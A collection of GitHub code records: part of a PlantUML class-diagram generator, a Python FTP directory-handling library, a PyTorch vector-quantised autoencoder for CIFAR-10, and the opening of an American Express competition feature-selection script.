self.template [ mutator_type ] [ 'types' ].append ( None )\n\n\n def get_utilities ( self, file ):\n\n data = open ( file, 'r' ).read ( )\n\n\n # Docstring\n\n regex = r'@return\\s*{(\\w+)}[^\\/]+\\/\\s*\\b(?!return\\b|let\\b|this\\b|if\\b|switch\\b|for\\b)(\\w+)\\s*\\([^\\)]+\\)'\n\n utilities = re.findall ( regex, data )\n\n\n for value in utilities:\n\n self.template [ 'utilities' ] [ 'names' ].append ( value [ 1 ] )\n\n self.template [ 'utilities' ] [ 'types' ].append ( value [ 0 ] )\n\n\n # Vanilla\n\n regex = r'\\s{2,4}\\b(?!constructor\\b|return\\b|let\\b|this\\b|if\\b|switch\\b|for\\b)(\\w+)\\s*\\([^\\)]+\\)'\n\n utilities = re.findall ( regex, data )\n\n\n for value in utilities:\n\n if value not in self.template [ 'utilities' ] [ 'names' ]:\n\n self.template [ 'utilities' ] [ 'names' ].append ( value )\n\n self.template [ 'utilities' ] [ 'types' ].append ( None )\n\n #### RENDERERS ########################################################\n\n def prepare_file ( self, file ):\n\n self.output_path = Util.set_file ( file, self.arguments [ 'destination'] )\n\n open ( self.output_path, 'w+' )\n\n\n def compose_header ( self ):\n\n header = f\"@startuml\\n\\n\"\n\n\n if 'skin_param' in self.arguments.keys ( ):\n\n for skin_param in self.arguments [ 'skin_param' ]:\n\n header += f\"{skin_param}\\n\"\n\n\n header += \"\\n\"\n\n\n header += f\"class {self.template [ 'class' ]} {{\\n\"\n\n\n self.plantuml_script = header\n\n\n def compose_members ( self ):\n\n members = ''\n\n pad = 3\n\n column_max = Util.get_column_max ( self.template ) + pad\n\n\n for tag_type in self.tags:\n\n members += f\"{self.tags [ tag_type ]}\\n\".lstrip ( )\n\n\n if self.template [ tag_type ] [ 'names' ]:\n\n for i, name in enumerate ( self.template [ tag_type ] [ 'names' ] ):\n\n\n if self.template [ tag_type ] [ 'types' ]:\n\n padding = column_max - len ( name )\n\n type = Util.filter_type ( self.template [ tag_type ] [ 'types' ] [ i ] )\n\n members += f\"{name}{' ' * padding}{type}\\n\" if type else f\"{name}\\n\"\n\n\n self.plantuml_script += members\n\n\n def compose_footer ( self ):\n\n self.plantuml_script += f\"}}\\n\\n@enduml\"\n\n\n def save_output ( self ):\n\n with open ( self.output_path, 'w' ) as writer:\n\n writer.write ( self.plantuml_script )\n\n print ( \">> [ output ] \\n\", f\"{self.output_path}\" )\n\n\n def compose_image ( self ):\n\n if 'plant_path' in self.arguments.keys ( ):\n\n for image_type in self.arguments [ 'make_image' ]:\n\n output_path = f\"{os.path.dirname ( self.output_path )}/images\"\n\n command = f\"java -jar {self.arguments [ 'plant_path' ]} \\\"{self.output_path}\\\" -o \\\"{output_path}\\\" -{image_type}\"\n\n filename = os.path.basename ( self.output_path ).replace ( 'txt', image_type )\n\n\n if Util.is_directory ( output_path ) is False:\n\n os.makedirs ( output_path )\n\n\n subprocess.run ( command, shell=True )\n\n\n print ( f\" {output_path}/{filename}\\n\" )\n","repo_name":"Justin-Byrne/ClassGenerator","sub_path":"source/app/core/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":8421,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"9085562988","text":"from __future__ import print_function\nfrom .shared import log, scheme_lookup, connection\nfrom .__local__ import LocalDirectory\nfrom ftplib import FTP, error_perm, error_temp, all_errors\ntry:\n from urlparse import urlsplit, urlparse #python 2.7\nexcept:\n from urllib.parse import urlsplit, urlparse\n\nimport time\nimport glob\nimport os\ntry:\n from StringIO import StringIO # python 2.7\n _P3 = False\nexcept:\n from io import StringIO, BytesIO # python 3\n _P3 = True\n basestring = (str, bytes)\n\n\nVERBOSE = True\nFORCE = True\n\n\nclass FtpDirectory(LocalDirectory):\n \"\"\" Directory handler with FTP connection \"\"\"\n ftp = None\n\n def __init__(self, url, ftp=None):\n \"\"\" a path to a ftp directory \"\"\"\n url = urlsplit(url) \n if url.scheme:\n if url.scheme not in [\"ftp\",\"sftp\"]:\n raise ValueError(\"scheme must be 'ftp://' for a FtpDirectory\")\n if ftp is None:\n ftp = FTP(url.hostname, url.username, url.password)\n #ftp = FTP(url.hostname)\n ftp.connect(url.hostname, url.port or 0)\n if url.username:\n ftp.login(url.username, url.password)\n\n ## store the username in the ftp so it can recovered later\n ftp.username = url.username\n username = url.username\n hostname = url.hostname \n else:\n username = getattr(ftp, \"username\", url.username or \"\")\n hostname = getattr(ftp, \"hostname\", url.hostname or \"\")\n #ftp.connect(url.hostname)\n #ftp.login(url.username, url.password) \n\n directory = url.path[1:] # remove the first '/' so the path \n # is relative to the connection point \n \n ## do not use the url.geturl() method in order to \n ## remove the password from the url representation \n path = '%s://'%url.scheme\n if username:\n path += username + \"@\"\n path += hostname + \"/\" + directory\n \n else:\n if ftp is None:\n raise ValueError(\"if no explicite sceme is present in url, a valid ftp connection must be present\")\n username = getattr(ftp, \"username\", url.username)\n directory = url.path\n path = \"ftp://%s%s/%s\"%(username+\"@\" if username else \"\", ftp.host, directory)\n \n LocalDirectory.__init__(self, path) \n\n self.remotedirectory = directory \n self.ftp = ftp \n\n @property\n def dirname(self):\n return self.remotedirectory\n \n @property\n def isremote(self):\n \"\"\" True if the directory is in remote access \"\"\"\n return True \n\n @property\n def connection(self):\n return connection('ftp', self._get_ftp())\n\n def _get_ftp(self):\n return self.ftp\n\n def login(self, user, password):\n return self._get_ftp().login(user, password)\n\n def put(self, files):\n \"\"\" put files in the directory \n\n files can be a string glob as e.g. \"*.txt\" or a list of file path\n \"\"\"\n ftp = self._get_ftp()\n\n if isinstance(files, basestring):\n files = ls(files) \n\n for file in files:\n with open(file,'rb') as f:\n d, filename = os.path.split(file) \n ftp.storbinary('STOR %s'%os.path.join(self.remotedirectory,filename), f) # send the file\n log.notice(\"file '%s' transfered in '%s' \"%(file, self.directory))\n \n\n def rmtree(self, path):\n \"\"\" remove the subrirectory in path \"\"\"\n ftp = self._get_ftp() \n return ftp_rmtree(ftp, os.path.join(self.remotedirectory, path))\n\n def ls(self, glob='*'):\n \"\"\" list file in directory from glob. e.g. '*.txt' \n\n The returned path are relative \n \"\"\"\n ftp = self._get_ftp() \n glob = ftp_path2path(ftp, glob) \n return remove_roots(ftp_ls(ftp, os.path.join(self.remotedirectory,glob)), self.remotedirectory) \n\n def listdir(self):\n ftp = self._get_ftp()\n return ftp.nlst()\n \n def get(self, files, inside, child=None):\n \"\"\" \n Parameters\n ----------\n files : string\n file glob \n \"\"\"\n child = child or self.fpath\n\n ftp = self._get_ftp()\n file = ftp_path2path(ftp, file) \n return [child(f) for f in ftp_mget(ftp, os.path.join(self.remotedirectory, files), inside)]\n\n if _P3:\n def open(self, file, mode='r'): \n \"\"\" open a file inside directory \"\"\" \n ftp = self._get_ftp()\n file = ftp_path2path(ftp, file)\n #print (\"FTP %s\"% os.path.join(self.remotedirectory, file))\n if 'b' in mode:\n return FtpBytesFile(ftp, os.path.join(self.remotedirectory, file), mode) \n else:\n return FtpFile(ftp, os.path.join(self.remotedirectory, file), mode) \n\n else:\n def open(self, file, mode='r'): \n \"\"\" open a file inside directory \"\"\" \n ftp = self._get_ftp()\n file = ftp_path2path(ftp, file)\n #print (\"FTP %s\"% os.path.join(self.remotedirectory, file))\n return FtpFile(ftp, os.path.join(self.remotedirectory, file), mode) \n\n def getmtime(self,file=''):\n ftp = self._get_ftp()\n file = ftp_path2path(ftp, file)\n\n t = ftp.sendcmd(\"MDTM %s\"%(os.path.join(self.remotedirectory, file)))\n t = time.strptime(t[4:], \"%Y%m%d%H%M%S\")\n return time.mktime(t)\n\n def stat(self, file=''):\n raise RuntimeError(\"Cannot get stat from ftp connection. Modification date only\") \n\n def getatime(self, file=''):\n raise RuntimeError(\"Cannot get access time from ftp connection. Modification date only\") \n\n def getctime(self, file=''):\n raise RuntimeError(\"Cannot get creation time from ftp connection. Modification date only\") \n \n def getsize(self, file=''):\n ftp = self._get_ftp()\n file = ftp_path2path(ftp, file) \n return ftp.size(os.path.join(self.remotedirectory, file))\n #raise RuntimeError(\"Cannot get size from ftp connection. Modification date only\") \n \n\n\n def exists(self):\n return self.remotedirectory in self.cd(\"..\").ls()\n\n def has(self, path):\n return path in self.ls() \n \n def append(self, file, strin):\n f = self.open(file)\n f.seek(0,2)\n f.write(strin)\n f.seek(0)\n ftp = self._get_ftp()\n ftp.storbinary('STOR %s'%os.path.join(self.remotedirectory,file), f)\n\n def appendlines(self, file, lines):\n f = self.open(file)\n f.seek(0,2)\n f.writelines(lines)\n f.seek(0)\n ftp = self._get_ftp()\n ftp.storlines('STOR %s'%os.path.join(self.remotedirectory,file), f)\n\n def isfile(self, filename):\n ftp = self._get_ftp()\n filename = ftp_path2path(ftp, filename) \n return ftp_isfile(ftp, os.path.join(self.remotedirectory, filename)) \n\n def isdir(self, dirname):\n ftp = self._get_ftp()\n dirname = ftp_path2path(ftp, dirname)\n return not ftp_isfile(ftp, os.path.join(self.remotedirectory, dirname)) \n\n def _path(self, relpath, ftp):\n ftppath = os.path.join(self.remotedirectory, relpath)\n path = (self,)+relpath\n\n if ftp_isfile(ftp, os.path.join(ftppath)): \n return fpath(*path)\n\n return dpath(*path)\n\n def makedirs(self, d):\n ftp = self._get_ftp()\n d = ftp_path2path(ftp,d) \n ftp_makedirs(ftp, os.path.join(self.remotedirectory,d), True)\n\n def build(self):\n ftp = self._get_ftp()\n ftp_makedirs(ftp, self.remotedirectory, True)\n return \n\n try:\n ftp_makedirs(ftp, self.remotedirectory, True)\n except error_perm as e:\n if \"550\" in str(e)[:4]:\n if ftp_isfile(ftp, self.remotedirectory):\n raise OSError(\"[Errno %d] File exists: '%s'\"%(os.errno.ENOTDIR, self.directory)) \n else:\n raise error_perm(e)\n return self \n \n def check(self):\n ftp = self._get_ftp()\n return ftp_exists(ftp, self.remotedirectory) and not ftp_isfile(ftp, self.remotedirectory)\n\n\n######################################################\n#\n# Record this ftp handler class to the shared sheme_lookup\n#\n######################################################\nscheme_lookup['ftp'] = FtpDirectory\n\n\nclass FtpFile(StringIO): \n def __init__(self, ftp, file, mode='r'):\n self.ftp = ftp \n self.file = file\n if 'r' in mode or 'a' in mode:\n buf = self._ftpread()\n if 'w' in mode:\n buf = ''\n StringIO.__init__(self, buf) \n if 'a' in mode:\n self.seek(0,2) \n self.mode = mode\n\n def __repr__(self):\n return \"\"%(self.file, self.ftp.host, self.mode, id(self))\n\n if _P3:\n def _ftpread(self):\n ftp = self.ftp\n strout = BytesIO()\n ftp.retrbinary(\"RETR %s\"%(self.file), strout.write)\n strout.seek(0)\n return strout.read().decode()\n else:\n def _ftpread(self):\n ftp = self.ftp\n strout = StringIO()\n ftp.retrbinary(\"RETR %s\"%(self.file), strout.write)\n strout.seek(0)\n return strout.read()\n\n if _P3:\n def _ftpwrite(self, strin):\n f = BytesIO(strin.encode())\n ftp = self.ftp \n ftp.storbinary('STOR %s'%(self.file), f) \n\n else:\n def _ftpwrite(self, strin):\n f = StringIO(strin)\n ftp = self.ftp\n ftp.storbinary('STOR %s'%(self.file), f) \n\n def close(self):\n mode = self.mode\n if not 'r' in mode:\n self.seek(0) \n self._ftpwrite(self.read()) \n StringIO.close(self)\n\n @property\n def name(self):\n return self.file\n @property\n def path(self):\n return fpath(file, ftp=self.ftp)\n\n def __del__(self):\n if not self.closed: \n self.close()\n\n def __exit__(self, *args):\n self.close()\n\n def __enter__(self):\n return self \n\n\n\nif _P3:\n class FtpBytesFile(BytesIO): \n def __init__(self, ftp, file, mode='rb'):\n self.ftp = ftp \n self.file = file\n if not 'b' in mode:\n raise RunTimeError(\"should be opened as binary\")\n\n if 'r' in mode or 'a' in mode:\n buf = self._ftpread()\n elif 'w' in mode:\n buf = b''\n else:\n buf = self._ftpread()\n BytesIO.__init__(self, buf) \n if 'a' in mode:\n self.seek(0,2) \n self.mode = mode\n\n def __repr__(self):\n return \"\"%(self.file, self.ftp.host, self.mode, id(self))\n\n \n def _ftpread(self):\n ftp = self.ftp\n strout = BytesIO()\n ftp.retrbinary(\"RETR %s\"%(self.file), strout.write)\n strout.seek(0)\n return strout.read()\n \n def _ftpwrite(self, bytesin):\n f = BytesIO(bytesin)\n ftp = self.ftp \n ftp.storbinary('STOR %s'%(self.file), f) \n\n def close(self):\n mode = self.mode\n if not 'r' in mode:\n self.seek(0) \n self._ftpwrite(self.read()) \n BytesIO.close(self)\n\n @property\n def name(self):\n return self.file\n @property\n def path(self):\n return fpath(file, ftp=self.ftp)\n\n def __del__(self):\n if not self.closed: \n self.close()\n\n def __exit__(self, *args):\n self.close()\n\n def __enter__(self):\n return self \n\n\n#####################################################################\n#\n# FTP high level functions \n#\n#####################################################################\n\ndef ftp_path2path(ftp,path):\n \"\"\" take a ftp connection and a path return the true path \n if path is an url or path. \n If the url hostanme or login is different than \n \"\"\"\n url = urlsplit(path)\n if not url.hostname:\n return path\n if url.hostname!=ftp.host:\n raise ValueError(\"connection mismatch : '%s', '%s'\"%(url.hostname, ftp.host))\n\n if url.username and url.username!=getattr(ftp,\"username\", url.username):\n raise ValueError(\"connection username mismatch : '%s', '%s'\"%(url.username, ftp.username))\n return url.path[1:] # remove the root '/'\n\n\n\n\ndef remove_roots(lst, root):\n root = os.path.normpath(root)+\"/\"\n n = len(root)\n return [l[n:] if l[:n]==root else l for l in (os.path.normpath(l) for l in lst)]\n\n\n\ndef _ftp_exists(ftp, path):\n r, d = os.path.split(path)\n return os.path.join(r,d) in ftp.nlst(r)\n\ndef _ftp_dir(ftp, pathes, pref, output):\n \n if not len(pathes):\n try:\n lst = [pref] if pref and (len(ftp.nlst(pref)) or _ftp_exists(ftp, pref)) else []\n ## if belowe line uncomment it will end up with a one depth more \n #lst = ftp.nlst(pref) if pref else ftp.nlst() \n except error_temp as e:\n code = str(e).split(\" \")[0]\n if code!='450':\n raise e\n else: \n #output.append(pref)\n \n output.extend(lst)\n return 0\n\n glb = pathes[0]\n pathes.pop(0)\n\n if not glob.has_magic(glb):\n \n return _ftp_dir(ftp, pathes, os.path.join(pref,glb), output) \n\n try:\n lst = ftp.nlst(pref) if pref else ftp.nlst()\n except error_temp as e:\n code = str(e).split(\" \")[0]\n if code!='450':\n raise e\n \n return len(pathes)\n else:\n if len(lst)==1 and lst[0]==pref: # this is a file not a directory\n \n return len(pathes) \n for item in lst: \n _, f = os.path.split(item)\n if glob.fnmatch.fnmatch(f, glb):\n _ftp_dir(ftp, list(pathes), item, output)\n return len(pathes)\n\ndef ftp_ls(ftp, glb):\n output = []\n pathes = glb.split(\"/\")\n pref = \"\"\n if pathes and glb[0]==\"/\":\n pathes[0] = \"/\"+pathes[0]\n _ftp_dir(ftp, pathes, pref, output)\n return output\n\n\ndef ftp_isfile(ftp, path):\n try:\n lst = ftp.nlst(path)\n except error_perm:\n return False\n return len(lst)==1 and lst[0]==path\n\ndef ftp_exists(ftp, path):\n _, d = os.path.split(path) \n return d in [os.path.split(s)[1] for s in ftp.nlst(os.path.join(path, \"..\"))]\n\n\ndef _ftp_makedirs(ftp, pathes, pref, noerr):\n if not len(pathes):\n return 0\n d = pathes[0]\n pathes.pop(0)\n d = os.path.join(pref,d)\n try:\n ftp.mkd(d)\n except error_perm as e: \n #if not len(pathes):\n if noerr: \n if ftp_isfile(ftp, d):\n raise error_perm(\"550 %s: File exists.\"%d)\n else:\n raise error_perm(e) \n return _ftp_makedirs(ftp, pathes, d, noerr) \n\ndef ftp_makedirs(ftp, dirs, noerr=False):\n pathes = dirs.split(\"/\")\n if pathes and dirs[0]==\"/\":\n pathes[0] = \"/\"+pathes[0]\n _ftp_makedirs(ftp, pathes, \"\", noerr)\n\ndef ftp_dirlist(ftp, directory, verbose=VERBOSE):\n \"\"\"\n Return a list of file of the directory in ftp connection\n the returned list does not contain the directory path\n \"\"\"\n listfile = []\n log.notice(\"Changing distant directory to %s\"%(directory))\n\n rtr = ftp.cwd(directory)\n log.notice(\"%s\"%(rtr))\n log.notice(\"Get file list \")\n\n rtr = ftp.retrlines('NLST', listfile.append)\n log.notice(\"%s\"%(rtr), verbose)\n\n return listfile\n\n\n\ndef ftp_rmtree(ftp, path):\n \"\"\"Recursively delete a directory tree on a remote server.\"\"\"\n wd = ftp.pwd()\n\n try:\n names = ftp.nlst(path)\n except all_errors as e:\n # some FTP servers complain when you try and list non-existent paths\n return\n\n for name in names:\n if os.path.split(name)[1] in ('.', '..'): continue\n\n\n try:\n ftp.cwd(name) # if we can cwd to it, it's a folder\n ftp.cwd(wd) # don't try a nuke a folder we're in\n ftp_rmtree(ftp, name)\n except all_errors:\n ftp.delete(name)\n\n try:\n ftp.rmd(path)\n except all_errors as e: \n return\n\ndef local_rmtree(path):\n import shutil\n shutil.rmtree(path)\n\n\ndef _ftp_glob_dirlist_rec(ftp, path_list, pref=\"\", verbose=VERBOSE):\n # walk through the path_list to get a list of files\n # ftp NLST to not allows to list a path of directory with the * like /tmp/*/*.txt\n # so we need to split the path and goes directory by directory if needed\n\n if not len(path_list):\n return []\n\n directory_glob = path_list.pop(0)\n if not glob.has_magic( directory_glob ):\n if not len(path_list):\n # end of the recursive call, just return the list\n file_list = []\n ftp.retrlines(\"NLST %s\"%pref+directory_glob , file_list.append)\n return file_list\n else:\n # if no magic found just stick to the prefix and send the rest of\n # path_list as a copy: list(path_list)\n return _ftp_glob_dirlist_rec(ftp, list(path_list), pref=pref+directory_glob+\"/\", verbose=verbose)\n\n directory_found = []\n\n # the following line works only with * not with more complex glob [0-9] etc ...\n #rtr = ftp.retrlines(\"NLST %s\"%pref+directory_glob , directory_found.append)\n # So we need to list all the directory and then match the files\n ftp.retrlines(\"NLST %s\"%pref, directory_found.append)\n #pref_len = len(pref)\n #directory_found = [l for l in directory_found if glob.fnmatch.fnmatch(l[pref_len:], directory_glob)]\n directory_found = [l for l in directory_found if glob.fnmatch.fnmatch(os.path.split(l)[1], directory_glob)]\n\n if not len(path_list):\n return directory_found\n\n output = []\n\n for d in directory_found:\n # list(path_list) to make a copy\n fls = _ftp_glob_dirlist_rec(ftp, list(path_list), pref=d+\"/\", verbose=verbose)\n # extend the output with the new found\n output.extend(fls)\n return output\n\n\n\n\n###############################################\n# old stuf \n\ndef ftp_put(ftp, local, remote): \n with open(local, 'rb') as f: \n ftp.storbinary('STOR %s'%remote, f) # send the file\n return remote\n\ndef ftp_get(ftp, remote, local):\n with open(local, \"wb\") as f:\n ftp.retrbinary(\"RETR %s\"%(remote),f.write)\n return local \n\ndef ftp_mget(ftp, remotes, localdir):\n if isinstance(remotes, basestring):\n files = ftp_ls(ftp, remotes)\n else:\n files = list(remotes)\n\n lst = [] \n for remote in files:\n _, name = os.path.split(remote)\n lst.append(ftp_get(ftp, remote, os.path.join(localdir, name)))\n return lst \n\ndef ftp_mput(ftp, flocals, remotedir):\n if isinstance(flocals, basestring):\n files = glob.glob(flocals)\n else:\n files = list(flocals)\n\n lst = [] \n for local in files:\n _, name = os.path.split(remote)\n lst.append(ftp_put(ftp, local, os.path.join(remotedir, name)))\n return lst \n\n\ndef ftp_lsdir(ftp, strglob, verbose=VERBOSE):\n \"\"\"\n ftp_lsdir(ftp, str)\n do the same thing than lsdir but for a ftp connection.\n \"\"\"\n return ftp_glob_dirlist_rec(ftp, strglob, verbose=verbose)\n\ndef ftp_glob_dirlist_rec( ftp, path, verbose=VERBOSE):\n path_list = path.split(\"/\")\n pref = \"\"\n if len(path_list) and path_list[0] == \"\":\n path_list.pop(0)\n pref= \"/\"\n log.notice( \"Looking for '%s:%s' in ftp connection ... \"%(ftp.host,path) )\n files= _ftp_glob_dirlist_rec(ftp, path_list, pref, verbose=verbose)\n log.notice( \"found %d\"%(len(files)) )\n return files\n\n\n\n\n\ndef ftp_transfer(ftp, strglob, localdir= \"\",distdir=\"\",\n verbose=VERBOSE, force=FORCE):\n \"\"\"\n ftp_transfer(ftp, strglob, localdir= \"\",distdir=\"\")\n Transfer file matching strglob from the ftp connection. The hierarchic path directory\n will be created from the localdir.\n distdir is the distant root ftp directory starting point, is equivalent\n to do a ftp.cwd( distdir) to change directory.\n\n \"\"\"\n if distdir and len(distdir):\n ftp.cwd(distdir)\n files = ftp_lsdir(ftp, strglob, verbose=verbose)\n if not len(files):\n return []\n return ftp_transfer_files( ftp, files, localdir=localdir,\n distdir=distdir,\n verbose=verbose, force=force)\n\n\n\ndef ftp_transfer_files(ftp, files, localdir= \"\", distdir=\"\", verbose=VERBOSE, force=FORCE):\n \"\"\"\n Transfer a list of files from the ftp connection. The hierarchic path directory\n will be created from the localdir.\n distdir is the distant root ftp directory starting point, is equivalent\n to do a ftp.cwd( distdir) to change directory.\n\n Return the list of local path to files\n \"\"\"\n if os.path.exists(localdir):\n if not os.path.isdir(localdir):\n raise Exception(\"The local path '%s' is not a directory\"%(localdir))\n else:\n os.makedirs(localdir) \n if distdir and distdir!=\"\":\n ftp.cwd(distdir)\n\n global _ftpfinished\n global _ftpwrfunc\n\n\n outlist = []\n for path in files:\n subdir, fl = os.path.split(path)\n if subdir[0:len(distdir)] == distdir:\n subdir = subdir[len(distdir):]\n create_dir(subdir, localdir, verbose=verbose)\n localpath = os.path.join(localdir, subdir, fl)\n\n if not force and os.path.exists(localpath):\n log.notice(\"file %s already exists use force=True to force download\"%(localpath))\n else:\n log.notice(\"FTP: Copying file %s:%s to %s \"%(ftp.host, fl, localdir+subdir))\n\n try:\n ftp.retrbinary(\"RETR %s\"%(path),open(localpath, \"wb\").write)\n except error_perm:\n log.warning(\"wrong permition for transfert %s\"%path) \n outlist.append( localpath )\n return outlist\n\n\ndef ftp_put_file(ftp, file, distdir=\"\"):\n if distdir:\n ftp.cwd(distdir)\n d, filename = os.path.split(file) \n file = open(file,'rb') # file to send\n \n ftp.storbinary('STOR %s'%filename, file) # send the file\n log.notice(\"file '%s' transfered in '%s/%s' \"%(filename,ftp.host, ftp.user()))\n file.close()\n\ndef create_dir(directory,inside=\"\", verbose=VERBOSE):\n \"\"\"\n recreate is necessary a directory structure from a path string \"a/b/c\" or a list [\"a\",\"b\",\"c\"]\n The second argument precise where the structure should be installed\n so create_dir( \"data/set1\", \"/tmp\") is the same than create_dir( \"tmp/data/set1\")\n\n \"\"\"\n\n if not os.path.isdir(inside):\n raise Exception( \"'%s' is not a directory\"%inside)\n if isinstance( directory, basestring):\n # save time exist if exists\n if os.path.isdir(os.path.join( inside,directory)):\n return None\n directories = directory.split(\"/\")\n else:\n directories = directory\n if os.path.isdir(os.path.join(inside, *directories)):\n return None\n\n sub = inside\n while len(directories):\n sub += \"/\"+directories.pop(0)\n\n if os.path.exists(sub):\n if not os.path.isdir(sub):\n raise Exception(\"'%s' exists but is not a directory \"%(sub))\n else:\n log.notice( verbose, \"Creating directory %s\"%sub)\n os.mkdir(sub)\n return None\n","repo_name":"SylvainGuieu/path","sub_path":"__ftp__.py","file_name":"__ftp__.py","file_ext":"py","file_size_in_byte":24162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72630970153","text":"import torch\r\nfrom torch import nn\r\nfrom torchvision.datasets import CIFAR10\r\nfrom torch.utils.data.dataloader import DataLoader\r\nimport torchvision.transforms as transforms\r\nfrom torch.autograd import Function\r\nimport torchvision\r\nimport torch.nn.functional as F\r\nfrom tqdm import tqdm, trange\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nimport numpy as np\r\n\r\ndef load_cifar10():\r\n transform = transforms.Compose(\r\n [transforms.ToTensor(),\r\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\r\n dataset = torchvision.datasets.CIFAR10('.', download=True, transform=transform)\r\n return dataset\r\n\r\n\r\nclass Encoder(nn.Module):\r\n def __init__(self):\r\n super(Encoder, self).__init__()\r\n \r\n self.resnet18 = torchvision.models.resnet18(pretrained=True)\r\n \r\n # adjust last layer to cifar10\r\n self.resnet18.fc = nn.Linear(512, 10)\r\n\r\n def forward(self, x):\r\n return self.resnet18(x)\r\n\r\n\r\nclass Quantizer(nn.Module):\r\n def __init__(self):\r\n super(Quantizer, self).__init__()\r\n self.K = 1024 # Number of elements in dictionary\r\n self.D = 10 # Dimension of each element in dictionary\r\n \r\n self.embedding = nn.Embedding(self.K, self.D)\r\n self.embedding.weight.data.normal_()\r\n\r\n self.mse_loss = nn.MSELoss()\r\n\r\n def forward(self, encoder_embedding):\r\n \"\"\"\r\n Takes the input from the encoder network and finds the nearest tensor in the dictionary.\r\n This Tensor will later be passed to the decoder network.\r\n \"\"\"\r\n \r\n # calculate the distance between the encoder embedding and every element in the dictionary\r\n distance = torch.sum((encoder_embedding.unsqueeze(1) - self.embedding.weight)**2, dim=2)\r\n \r\n # find the index of the nearest element in the dictionary\r\n quantized_embedding_indices = torch.argmin(distance, dim=1)\r\n\r\n # find the nearest element in the dictionary\r\n quantized_embedding = self.embedding(quantized_embedding_indices)\r\n \r\n # compute quantization loss\r\n # this loss is not backpropagated to the encoder network\r\n quantization_loss = self.mse_loss(encoder_embedding.detach(), quantized_embedding)\r\n \r\n # preserve gradients\r\n quantized_embedding = encoder_embedding + (quantized_embedding - encoder_embedding).detach()\r\n \r\n loss = quantization_loss\r\n \r\n return quantized_embedding, loss\r\n\r\n\r\nclass Decoder(nn.Module):\r\n def __init__(self):\r\n super(Decoder, self).__init__()\r\n \r\n # 10 ==> 64 ==> 128 ==> 256 ==> 512 ==> 1024 ==> 3072\r\n self.fc1 = nn.Linear(10,64)\r\n self.fc2 = nn.Linear(64, 128)\r\n self.fc3 = nn.Linear(128, 256)\r\n self.fc4 = nn.Linear(256, 512)\r\n self.fc5 = nn.Linear(512, 32*32)\r\n self.fc6 = nn.Linear(1024, 32*32*3)\r\n \r\n self.dropout = nn.Dropout(0.2) \r\n \r\n def forward(self, quantized_embedding):\r\n \"\"\"\r\n Takes the quantized embedding from the quantizer network and reconstructs the image.\r\n \"\"\"\r\n\r\n x = F.relu(self.fc1(quantized_embedding))\r\n x = self.dropout(x)\r\n\r\n x = F.relu(self.fc2(x))\r\n x = self.dropout(x)\r\n \r\n x = F.relu(self.fc3(x))\r\n x = self.dropout(x)\r\n\r\n x = F.relu(self.fc4(x))\r\n x = self.dropout(x)\r\n\r\n x = F.relu(self.fc5(x))\r\n x = self.dropout(x)\r\n \r\n x = self.fc6(x)\r\n x = x.reshape(-1, 3, 32, 32)\r\n \r\n return x\r\n \r\n# Training Loop\r\n\r\nif __name__==\"__main__\":\r\n dataset = load_cifar10()\r\n dataloader = DataLoader(dataset, batch_size=64, shuffle=True, num_workers=4)\r\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\r\n EPOCHS = 50\r\n\r\n encoder = Encoder().to(device)\r\n quantizer = Quantizer().to(device)\r\n decoder = Decoder().to(device)\r\n\r\n mse_loss = nn.MSELoss()\r\n\r\n optimizer = torch.optim.SGD(list(encoder.parameters()) + list(quantizer.parameters()) + list(decoder.parameters()), lr=1e-1, weight_decay=1e-5)\r\n\r\n lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[45], gamma=0.1)\r\n\r\n tb_writer = SummaryWriter()\r\n \r\n for epoch in list(range(EPOCHS)):\r\n \r\n batch_iter = tqdm(enumerate(dataloader), 'Training', total=len(dataloader), leave=False)\r\n train_losses = []\r\n for batch_idx, batch in batch_iter:\r\n input, target_label = batch\r\n input = input.to(device)\r\n # target = target.to(device)\r\n \r\n encoder_embedding = encoder(input)\r\n quantized_embedding, qaunt_loss = quantizer(encoder_embedding)\r\n pred = decoder(quantized_embedding)\r\n\r\n # reconstruction losses:\r\n recon_loss = mse_loss(input, pred)\r\n\r\n # total loss:\r\n loss = recon_loss + qaunt_loss\r\n \r\n optimizer.zero_grad() # zerograd the parameters\r\n loss.backward()\r\n optimizer.step()\r\n\r\n train_losses.append(loss.item())\r\n batch_iter.set_description(f'Training: [{epoch:d}/{EPOCHS:d}] (loss {loss.item():.4f})') # update progressbar\r\n\r\n \r\n if batch_idx % 10 == 0: \r\n tb_writer.add_images('input', (input[:5,...]+0.5).clip(0,1), epoch)\r\n tb_writer.add_images('decoder output', (pred[:5,...]+0.5).clip(0,1), epoch)\r\n tb_writer.flush()\r\n \r\n tb_writer.add_scalar('Loss/train', np.mean(train_losses), epoch)\r\n tb_writer.add_scalar('lr', optimizer.param_groups[0]['lr'], epoch)\r\n tb_writer.flush()\r\n lr_scheduler.step()\r\n\r\n \r\n \r\n \r\n ","repo_name":"AmitNativ1984/MenteeRobotics","sub_path":"auto_encoder_question.py","file_name":"auto_encoder_question.py","file_ext":"py","file_size_in_byte":5840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16746120870","text":"import boto3\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_selection import RFECV\nfrom sklearn.metrics import make_scorer\nfrom sklearn.ensemble import RandomForestClassifier\nfrom Amex_Metric import amex_metric\n\ns3 = boto3.resource('s3')\nbucket_name = 'analytics-data-science-competitions'\nbucket = s3.Bucket(bucket_name)\n\n## Defining files names\nfile_key = 'AmericanExpress/Delinquency_Features_Filled.csv'\n\nbucket_object = bucket.Object(file_key)\nfile_object = bucket_object.get()\nfile_content_stream = file_object.get('Body')\n\n## Reading data-files\ndata = pd.read_csv(file_content_stream)\ndata = data.drop(columns = ['D_64_last'], axis = 1)\n\n## Putting variables in the right shape \ndata['D_68_last'] = data['D_68_last'].astype(str)\ndata['D_114_last'] = data['D_114_last'].astype(str)\ndata['D_116_last'] = data['D_116_last'].astype(str)\ndata['D_117_last'] = data['D_117_last'].astype(str)\ndata['D_120_last'] = data['D_120_last'].astype(str)\ndata['D_126_last'] = 